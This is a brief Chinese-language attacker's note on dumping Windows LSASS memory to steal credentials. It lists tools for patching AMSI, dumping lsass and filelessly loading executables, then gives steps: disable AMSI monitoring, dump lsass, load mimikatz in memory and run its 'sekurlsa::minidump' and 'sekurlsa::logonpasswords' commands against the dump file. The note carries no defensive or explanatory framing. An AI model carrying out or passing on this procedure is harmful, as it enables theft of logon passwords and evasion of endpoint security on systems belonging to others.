转储LSASS

notes

工具:

AMSI_Patches.exe      #ASMI修补工具
MiniDump.exe          #转储lsass内存
RemotePE.exe          #无文件远程执行PE程序

1.修补Asmi,干掉当前进程的Asmi监控

2.使用minidump.exe转储lsass

3.无文件远程PE加载mimikatz读取lsass

sekurlsa::minidump C:\Users\pc3\AppData\Local\Temp\c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp
sekurlsa::logonpasswords